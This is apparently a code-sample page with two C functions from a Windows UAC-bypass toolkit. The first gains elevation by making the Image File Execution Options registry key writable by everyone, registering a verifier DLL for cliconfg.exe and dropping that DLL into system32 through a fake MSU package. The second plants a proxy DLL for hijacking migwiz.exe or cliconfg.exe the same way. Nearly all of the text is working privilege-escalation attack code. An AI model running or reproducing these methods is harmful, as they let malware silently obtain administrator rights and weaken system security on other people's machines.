Beispiel #1
0
/*
* ucmAvrfMethod
*
* Purpose:
*
* Acquire elevation through Application Verifier dll injection.
*
*/
BOOL ucmAvrfMethod(
    CONST PVOID AvrfDll,
    DWORD AvrfDllSize
)
{
    BOOL bResult = FALSE, cond = FALSE;
    HKEY hKey = NULL, hSubKey = NULL;
    LRESULT lRet;
    DWORD dwValue = 0x100; // FLG_APPLICATION_VERIFIER;
    WCHAR szCmd[MAX_PATH * 4];

    if (
        (AvrfDll == NULL) ||
        (AvrfDllSize == 0)
    )
    {
        return bResult;
    }

    do {

        //
        // Set new key security dacl
        // Red Alert: manually restore IFEO key permissions after using this tool, as they are not inherited.
        //
        if (!ucmSimdaAlterKeySecurity(T_IFEO, T_SDDL_ALL_FOR_EVERYONE)) {
            OutputDebugString(TEXT("[UCM] Failed to alter key security"));
            break;
        }

        //open IFEO key
        lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options"),
                            0, KEY_ALL_ACCESS, &hKey);
        if ((lRet != ERROR_SUCCESS) || (hKey == NULL)) {
            OutputDebugString(TEXT("[UCM] Failed to open IFEO key"));
            break;
        }

        //Set new key and values
        hSubKey = NULL;
        lRet = RegCreateKey(hKey, TEXT("cliconfg.exe"), &hSubKey);
        if ((hSubKey == NULL) || (lRet != ERROR_SUCCESS)) {
            OutputDebugString(TEXT("[UCM] Failed to create IFEO subkey"));
            break;
        }

        lRet = RegSetValueEx(hSubKey, TEXT("GlobalFlag"), 0, REG_DWORD, (BYTE*)&dwValue, sizeof(DWORD));
        if (lRet != ERROR_SUCCESS) {
            OutputDebugString(TEXT("[UCM] Failed to set subkey value 1"));
            break;
        }

        dwValue = (DWORD)_strlen(T_AVRFDLL) * sizeof(TCHAR);
        lRet = RegSetValueEx(hSubKey, TEXT("VerifierDlls"), 0, REG_SZ, (BYTE*)&T_AVRFDLL, dwValue);
        if (lRet != ERROR_SUCCESS) {
            OutputDebugString(TEXT("[UCM] Failed to set subkey value 2"));
            break;
        }

        // Cleanup registry, we don't need anymore.
        RegCloseKey(hSubKey);
        hSubKey = NULL;
        RegCloseKey(hKey);
        hKey = NULL;

        //
        // Extract file to the protected directory
        // First, create cab with fake msu ext, second run fusion process.
        //
        if (!ucmCreateCabinetForSingleFile(T_AVRF_SOURCEDLL, AvrfDll, AvrfDllSize)) {
            break;
        }
        // Drop Hibiki to system32
        if (!ucmWusaExtractPackage(T_AVRF_CMDLINE)) {
            OutputDebugString(TEXT("[UCM] Wusa failed copy Hibiki"));
            break;
        }

        // Finally run target fusion process.
        RtlSecureZeroMemory(szCmd, sizeof(szCmd));
        if (ExpandEnvironmentStringsW(METHOD_SQLSRV_TARGETAPP,
                                      szCmd, MAX_PATH) == 0)
        {
            break;
        }
        bResult = supRunProcess(szCmd, NULL);

    } while (cond);

    if (hKey != NULL) {
        RegCloseKey(hKey);
    }
    if (hSubKey != NULL) {
        RegCloseKey(hSubKey);
    }
    return bResult;
}
Beispiel #2
0
/*
* ucmWusaMethod
*
* Purpose:
*
* Build and install fake msu package then run target application.
*
*/
BOOL ucmWusaMethod(
    UACBYPASSMETHOD Method,
    PVOID ProxyDll,
    DWORD ProxyDllSize
    )
{
    BOOL   bResult = FALSE, cond = FALSE;
    LPWSTR lpCommandLine;
    WCHAR  szSourceDll[MAX_PATH * 2];
    WCHAR  szTargetProcess[MAX_PATH * 2];

    if ((ProxyDll == NULL) || (ProxyDllSize == 0)) {
        return FALSE;
    }

    _strcpy(szTargetProcess, g_ctx.szSystemDirectory);
    _strcpy(szSourceDll, g_ctx.szTempDirectory);

    switch (Method) {

        //use migwiz.exe as target
    case UacMethodCarberp1:
        _strcat(szSourceDll, WDSCORE_DLL);
        lpCommandLine = CMD_EXTRACT_MIGWIZ;
        _strcat(szTargetProcess, MIGWIZ_DIR);
        _strcat(szTargetProcess, MIGWIZ_EXE);
        break;

        //use cliconfg.exe as target
    case UacMethodCarberp2:
        _strcat(szSourceDll, NTWDBLIB_DLL);
        lpCommandLine = CMD_EXTRACT_SYSTEM32;
        _strcat(szTargetProcess, CLICONFG_EXE);
        break;

    default:
        return FALSE;
    }

    if (!PathFileExists(szTargetProcess)) {
        supDebugPrint(TEXT("ucmWusaMethod"), ERROR_FILE_NOT_FOUND);
        return FALSE;
    }

    do {

        //
        // Extract file to the protected directory
        // First, create cab with fake msu ext, second run fusion process.
        //
        if (!ucmCreateCabinetForSingleFile(szSourceDll, ProxyDll, ProxyDllSize)) {
            break;
        }

        if (!ucmWusaExtractPackage(lpCommandLine)) {
            break;
        }

        //run target process for dll hijacking
        bResult = supRunProcess(szTargetProcess, NULL);

    } while (cond);


    return bResult;
}